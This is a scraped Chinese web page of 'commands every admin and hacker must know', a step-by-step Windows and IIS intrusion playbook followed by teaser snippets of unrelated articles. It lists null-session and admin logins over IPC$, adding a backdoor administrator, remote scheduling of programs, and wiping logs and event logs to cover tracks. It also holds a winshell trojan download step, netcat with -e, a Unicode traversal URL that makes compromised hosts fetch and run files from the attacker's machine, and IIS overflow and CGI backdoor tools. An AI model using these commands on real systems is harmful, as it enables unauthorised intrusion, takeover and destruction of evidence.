网管和黑客都必须知道的命令_应用技巧

网管和黑客都必须知道的命令

常用的几条NET命令: 

(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" 

(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" 

(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ 

(查看远程主机时间) net time \\IP地址 

(定时启动某个程序) at \\IP地址 02:18 readme.exe 

(查看共享) net view \\IP地址 

(查看netbios工作组列表) nbtstat -A IP地址 

(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" 

(这两条把自己增加到管理员组): net user 用户名 密码 /add 

net localgroup Administrators 用户名 /add 

(断开连接) net use \\IP地址\ipc$ /delete 
扫尾: 

del C:\winnt\system32\logfiles\*.* 

del C:\winnt\ssytem32\config\*.evt 

del C:\winnt\system32\dtclog\*.* 

del C:\winnt\system32\*.log 

del C:\winnt\system32\*.txt 

del C:\winnt\*.txt 

del C:\winnt\*.log 

一、netsvc.exe 

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 

netsvc /list \\IP地址 

netsvc schedule \\IP地址 /query 

netsvc \\IP地址 schedule /start 

二、OpenTelnet.exe 

远程启动主机的Telnet服务,并绑定端口到7878,例如: 

OpenTelnet \\IP地址 用户名 密码 1 7878 

然后就可以telnet到主机的7878端口,进入DOS方式下: 

telnet IP地址 7878 
三、winshell.exe 

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面

的命令: 

p Path (查看winshell主程序的路径信息) 

b reBoot (重新启动机器) 

d shutDown (关闭机器) 

s Shell (执行后你就会看到可爱的“C:\>”) 

x eXit (退出本次登录会话,此命令并不终止winshell的运行) 

CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 

四、3389登陆器,GUI方式登录远程主机的 

五、elsave.exe 

事件日志清除工具 

elsave -s \\IP地址 -l "application" -C 

elsave -s \\IP地址 -l "system" -C 

elsave -s \\IP地址 -l "security" -C 

执行后成功清除应用程序日志,系统日志,安全日志 

六、hbulot.exe 

开启win2kserver和winxp的3389服务 

hbulot [/r] 

使用/r表示安装完成后自动重起目标使设置生效。 

七、nc.exe(netcat.exe) 

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 

想要连接到某处: nc [-options] hostname port[s] [ports] ... 

绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 

参数: 

-e prog 程序重定向,一旦连接,就执行 [危险!!] 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, ... 

-h 帮助信息 

-i secs 延时的间隔 

-l 监听模式,用于入站连接 

-n 指定数字的IP地址,不能用hostname 

-o file 记录16进制的传输 

-p port 本地端口号 

-r 任意指定本地及远程端口 

-s addr 本地源地址 

-u UDP模式 

-v 详细输出——用两个-v可得到更详细的内容 

-w secs timeout的时间 

-z 将输入输出关掉——用于扫描时 
八、TFTPD32.EXE 

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用

Unicode漏洞或telnet到肉鸡,例如: 

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件

名 c:\winnt\system32\文件名 

然后可以直接令文件运行: 

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 

九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个

端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。

xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP

执行权限的目录。然后用IE浏览器连接。 

一、一 Xscan命令行运行参数说明: 

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,

按"<ctrl+c>"强行关闭程序。 

1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 

xscan -file <主机列表文件名> <检测项目> [其他选项] 

其中<检测项目> 含义如下: 

-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定

制待检测端口列表); 

-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); 

-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); 

-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); 

-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); 

[其他选项] 含义如下: 

-v: 显示详细扫描进度 

-p: 跳过Ping不通的主机 

-o: 跳过没有检测到开放端口的主机 

-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10

时间: 2024-07-29 21:34:45

网管和黑客都必须知道的命令_应用技巧的相关文章

问题收集帖动网论坛完整程序包下载地址(包含所有补丁)_应用技巧

问题收集帖动网论坛完整程序包下载地址(包含所有补丁) Dvbbs7.1.0_Ac.exe 动网论坛完整程序包下载地址(包含所有补丁) Dvbbs7.1.0_Ac.exe动网论坛[05.23]更新补丁下载地址 Q20060430.exe(含重要更新) 为什么我用了5.1的更新后,不能播放多媒体文件,变成乱码了?进入论坛后台--基本设置--系统设置脚本扩展过滤设置里含对"object"或"EMBED"的过滤,此过滤现在可以去掉了,因为新的机制已经对它做了过滤,将这里改为

官网 Ext direct包中.NET版的问题_实用技巧

主要问题在返回的结果 result 标记对应的数据是字符串,请看以下官方例子中返回的数据: 复制代码 代码如下: {"type":"rpc","tid":2,"action":"Sample","method":"SaveForm","result":"{\"firstName\":\"4\",\&

忠网广告 系统 用到的几个函数_应用技巧

复制代码 代码如下: <%  '///****************************************************************** '  常用公共函数库 文件名:PubFunction.asp  '******************************************************************///    Const Go_back="<a href='javascript:history.back(1)'&

原来ASP和PHP都是可以删除自身的_应用技巧

z.asp 复制代码 代码如下: <%  s= Server.MapPath("z.asp")  Set fso = CreateObject("Scripting.FileSystemObject")  If fso.FileExists(s) Then    fso.Deletefile(s)  End If  Set fso = Nothing  %>  z.php 复制代码 代码如下: <?php  $file = "z.php&

这样设置路由,99.9%的黑客都攻不破

    路由安全,是个大话题. 路由器的后台设置项太过专业,蹭网卡风靡一时,传说中的黑客似乎厉害的没影......看起来家里这台路由器根本就没得救了.只要有位稍懂的黑客盯上,分分钟被攻破. 宅客君(公众号『Letshome』)之前曾从多个角度探讨这个话题,包括技术分析.测试.协议规范溯源等等.但这些东西里边,都没有谈过路由本身多年发展的安全机制.我们忽略了最重要的东西:其实通过路由本身的安全防护,已经可以做到一个非常高的安全水平. 下边宅客君将告诉大家,如何利用这些熟悉而又陌生的路由安全设置,来

世界上最奇葩的黑客都做了什么?

       315晚会上,全国大爷大妈面前的电视机里,出现了一个"怪人",他坐在一个硕大无朋的赌桌前,如先知布道一般,对"愚蠢的人类"陈述他的安全忧思.讲真,还从没有一个黑客以这种姿势降临人间. 也许从这个时点开始,王琦成为中国黑客在大众心中的吉祥物.这张顶配的黑客脸,配以不急不缓的语气,神秘而略带邪恶的神态.让人不得不对他接下来要说的话抱以期待. 一个技术范儿大叔,生生玩成了<我是歌手>的评委,也算是黑客界的一个突破吧. [王琦和<我是歌手&g

乐天中国官网疑遭黑客攻击瘫痪,有技术人员呼吁继续声讨

 据乐天集团3月1日消息,乐天中国官网(lotte.cn)前日下午陷入瘫痪.截止雷锋网发稿前,乐天官网依然无法打开. 有观点认为,乐天官网瘫痪为黑客发起病毒攻击所致.2月27日和28日乐天中国官网的流量骤增至平时的10-25倍左右.乐天有关负责人表示,目前可发现部分网民对乐天官网的个别攻击行为,但尚无有组织的攻击或抵制行为. 目前并未有黑客组织或者个人声明对此负责. 2月28日乐天集团与韩军就部署"萨德"签署易地协议.根据协议,乐天向国防部出让星州高球场,国防部将南杨州市军用地块转让给

央视揭秘六省市断网事件背后黑客产业经济链

[核心访问:六省市断网事件背后的黑客产业经济链] 李小萌:到底是什么原因造成了六个省份的大面积网络瘫痪,和互联网同时诞生的黑客到了今天又有怎样的特性,今天我们就请到了中国科学院软件所研究员.信息安全国家重点实验室主任冯登国先生,和上海一家网络安全技术公司的年轻的董事长刘庆,刘庆刚来时候我说我们的小黑客来了,刘庆说,不,是大黑客,当然是曾经的.现在先请两位给我们一起解释一下,这次发生的事件原因是什么? 刘庆:因为网站之间是做同一种业务的,所以会有一些商业竞争,现在网上的商业竞争非常激烈,导致两家网

网络连接-能连外网,不能连内网,什么系统都这样,求大神

问题描述 能连外网,不能连内网,什么系统都这样,求大神 电脑用着用着就不能连没网了,但是能上去外网,重装系统也不行,试过windows.mubuntu求大神帮忙 解决方案 内网,即局域网,你在命令行敲 ipconfig,看一下局域网网关是不是你的内网的ip 解决方案二: 是不是你ip冲突造成到... 解决方案三: 原因很多,但是能上外网,说明网关应该是没问题的,是不是IP冲突或者子网掩码设置错误?